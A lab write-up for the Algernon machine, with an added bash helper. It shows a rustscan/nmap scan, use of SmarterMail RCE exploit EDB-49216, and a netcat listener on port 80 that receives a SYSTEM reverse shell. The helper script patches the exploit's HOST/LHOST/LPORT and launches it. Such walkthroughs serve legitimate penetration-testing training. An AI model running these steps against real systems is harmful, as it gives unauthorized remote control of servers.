# Algernon

## nmap

```
mkdir nmap
# rustscan sweeps all ports quickly, then hands the open ones to nmap (everything after --)
# for service/version and OS detection (-A); -oA writes .nmap/.gnmap/.xml into nmap/
sudo rustscan -a 192.168.96.65 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
```

A web server is listening on port 9998, and there is also an interesting service on port 17001. Keep the second one in mind: it is the port the SmarterMail exploit used below connects to.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-MkJXNSLl8CFYStdNMAQ%2F-MkJXlfwPL3KrUTn7ib7%2Fimage.png?alt=media&#x26;token=ec6531c0-a458-4616-a9ca-371a8e8187bd" alt=""></div>

Opening port 9998 in a browser redirects to a log-in page.

![](https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-MkJXNSLl8CFYStdNMAQ%2F-MkJYVSP_OBsspNFZLwA%2Fimage.png?alt=media\&token=84218a5e-b39b-466f-9659-cbf10996e83d)

## Exploitation

The log-in page identifies the application as `SmarterMail`, and searching for it turns up a Remote Code Execution exploit we can try.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-MkJYZq4vTWi_RG_SAo2%2F-MkJZ3Lm0poA5xbXRVc6%2Fimage.png?alt=media&#x26;token=6595c6b1-aeb2-4d22-9530-429455025b9d" alt=""></div>

Mirror the exploit to the working directory (`searchsploit -m 49216`).

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-MkJYZq4vTWi_RG_SAo2%2F-MkJZPuNjy8pf4RAy4LY%2Fimage.png?alt=media&#x26;token=713e12e7-d81d-4436-8f6e-3e97998e7a7a" alt=""></div>

Edit the script: set `HOST` to the target IP address, `LHOST` to your own IP address, and `LPORT` to 80.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-MkJYZq4vTWi_RG_SAo2%2F-MkJZysRulvNUcLmvu36%2Fimage.png?alt=media&#x26;token=763f8683-22c5-49da-b59c-5f21eda9c5f4" alt=""></div>

Set up a reverse shell listener on port 80. The listener must be running before the exploit fires, and binding port 80 needs root.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-MkJYZq4vTWi_RG_SAo2%2F-MkJ_FJzvZxagSO1ljhb%2Fimage.png?alt=media&#x26;token=7984c5ce-8b59-437d-b67a-7c7f95fc4bcd" alt=""></div>

Run the script with `python3 49216.py`; you should receive a shell running as `nt authority\system`, so no further privilege escalation is needed.

<div align="left"><img src="https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-MkJYZq4vTWi_RG_SAo2%2F-MkJ_gWwgJXISgu4AX2v%2Fimage.png?alt=media&#x26;token=a0f5aa20-6d62-4b45-ac9d-4707eced932c" alt=""></div>
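The steps above (mirror the exploit, set `HOST`/`LHOST`/`LPORT`, start the listener, run the script) as one script. This is an added example, not part of the original writeup and not the exploit author's code. It assumes the exploit keeps its settings as plain top-level Python assignments such as `HOST = '10.0.0.1'` and `LPORT = 4444` (the `sed` patterns only touch lines of that shape); the `write_sample` stub is a constructed stand-in for the top of `49216.py` so the patching can be exercised offline, and the attacker address `192.168.49.96` is a placeholder. The real run (`--run`) needs `searchsploit`, `nc` and root for the port 80 listener.

```bash
#!/usr/bin/env bash
# Added helper for the Algernon writeup: patch the EDB-49216 settings and
# fire the exploit with the listener already up. Not the original page's code.
set -eu

# Rewrite one top-level "NAME = value" assignment in a Python script, in place.
# $1 = script path, $2 = variable name, $3 = new value.
# Assumption: the exploit stores its settings as such assignments.
set_var() {
    local script="$1" name="$2" value="$3"
    case "$value" in
        # Anything that is not all digits (an IP address) is written as a quoted string
        ''|*[!0-9]*) sed -i -E "s/^${name}[[:space:]]*=.*/${name} = '${value}'/" "$script" ;;
        # Ports stay bare integers
        *)           sed -i -E "s/^${name}[[:space:]]*=.*/${name} = ${value}/" "$script" ;;
    esac
}

# Print the current value of a top-level assignment (quotes stripped), for a sanity check.
get_var() {
    local script="$1" name="$2"
    sed -n -E "s/^${name}[[:space:]]*=[[:space:]]*'?([^']*)'?[[:space:]]*$/\1/p" "$script" | head -n 1
}

# Apply the three values the writeup tells you to change.
patch_exploit() {
    local script="$1" host="$2" lhost="$3" lport="$4"
    set_var "$script" HOST  "$host"
    set_var "$script" LHOST "$lhost"
    set_var "$script" LPORT "$lport"
}

# Constructed stand-in for the first lines of 49216.py (the real script is much longer);
# used only so patch_exploit can be demonstrated without the exploit present.
write_sample() {
    cat > "$1" <<'EOF'
#!/usr/bin/env python3
HOST = '192.168.1.10'
PORT = 17001
LHOST = '192.168.1.11'
LPORT = 4444
EOF
}

# The real sequence: mirror, patch, listener first, then the exploit.
# The exploit is started in the background after a short delay so that the
# listener owns the terminal and the incoming shell is usable.
run_exploit() {
    local host="$1" lhost="$2" lport="$3"
    searchsploit -m 49216                       # copies 49216.py into the current directory
    patch_exploit 49216.py "$host" "$lhost" "$lport"
    ( sleep 2; python3 49216.py ) &
    sudo nc -lvnp "$lport"                      # port 80 needs root
}

if [ "${1:-}" = "--run" ]; then
    # usage: ./algernon.sh --run <target> <your ip> <listener port>
    run_exploit "$2" "$3" "$4"
else
    # Offline demonstration on the constructed sample
    demo=$(mktemp)
    write_sample "$demo"
    patch_exploit "$demo" 192.168.96.65 192.168.49.96 80
    grep -E '^(HOST|PORT|LHOST|LPORT) ' "$demo"
    rm -f "$demo"
fi
```

Running the file with no arguments only patches the constructed sample and prints the resulting assignments; `PORT` (17001) is deliberately left alone, since the exploit, not the operator, picks the service port.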
